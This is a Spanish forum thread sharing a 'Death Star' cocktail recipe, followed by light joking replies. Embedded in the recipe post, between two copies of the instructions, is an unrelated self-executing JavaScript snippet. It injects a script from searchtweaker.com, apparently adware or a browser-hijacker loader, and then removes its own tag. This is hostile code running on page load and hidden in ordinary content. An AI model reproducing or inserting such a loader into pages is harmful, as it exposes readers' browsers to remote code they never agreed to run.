Estrella de la Muerte
5 participantes
Página 1 de 1.
Estrella de la Muerte
[Tienes que estar registrado y conectado para ver esa imagen]
Ingredientes
Cómo preparar Estrella de la Muerte
1Verter todos los ingredientes en un vaso highball lleno casi hasta arriba de cubitos de hielo.
2Añadir el refresco de cola.
3Agitar.
4Es una receta extraída de Cinemanía.es, que cita como fuente la web "Topless Robot".
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();Ingredientes
- 1 onza de Jägermeister (u otro licor de hierbas del tipo Chartreuse)
- 1 onza de bourbon
- 1 onza de triple sec
- 2 onzas de refresco de cola
- 1 onza de vodka
- 1 onza de sweet and sour
Cómo preparar Estrella de la Muerte
1Verter todos los ingredientes en un vaso highball lleno casi hasta arriba de cubitos de hielo.
2Añadir el refresco de cola.
3Agitar.
4Es una receta extraída de Cinemanía.es, que cita como fuente la web "Topless Robot".
Lilith
Re: Estrella de la Muerte
y despues vamos bolingas [Tienes que estar registrado y conectado para ver esa imagen]
paraca
jajaja si pues si Es el desayuno Jedi, luego normal muevan cosas con la mente.... y el mundo entero.... pero con ese nombre quien puede resistirse? jeje
Ikerj
thabe escribió:sólo sabiendo el nombre...no sé yo si me arriesgaría...jajaja
jajajaa yo es que soy muy valeroso, menos si hay tarantulas de por medio..... ejem...
Ikerj
Ikerj escribió:jajajaa yo es que soy muy valeroso, menos si hay tarantulas de por medio..... ejem... [Tienes que estar registrado y conectado para ver esa imagen]
jeje...¿por una arañita?... [Tienes que estar registrado y conectado para ver esa imagen]
thabe
thabe escribió:Ikerj escribió:jajajaa yo es que soy muy valeroso, menos si hay tarantulas de por medio..... ejem... [Tienes que estar registrado y conectado para ver esa imagen]
jeje...¿por una arañita?... [Tienes que estar registrado y conectado para ver esa imagen]
jajajaaa no si ya...arañita....
Ikerj